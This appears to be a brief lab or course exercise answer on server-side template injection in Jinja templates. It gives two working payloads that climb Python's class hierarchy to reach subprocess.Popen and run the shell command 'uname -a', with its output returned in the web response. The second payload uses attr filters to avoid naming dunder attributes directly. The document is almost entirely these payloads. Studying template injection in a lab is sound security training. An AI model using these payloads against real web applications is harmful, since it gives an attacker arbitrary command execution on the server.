9.6.2
Using the Python and Jinja documentation, make changes to the template that will allow the output to display in the response.
{{''.__class__.__mro__[2].__subclasses__()[233]('uname -a',shell=True,stdout=-1).communicate()[0].strip()}} # From https://gist.github.com/mgeeky/fd994a067e3407fd87e8c224e65df8d8
{% set string = "ssti" %}
{% set class = "__class__" %}
{% set mro = "__mro__" %}
{% set subclasses = "__subclasses__" %}
{% set mro_r = string|attr(class)|attr(mro) %}
{% set subclasses_r = mro_r[1]|attr(subclasses)() %}
{{ subclasses_r[1153](['uname', '-a'], stdout=-1).communicate()}} # Use stdout=-1 to dump all contents to response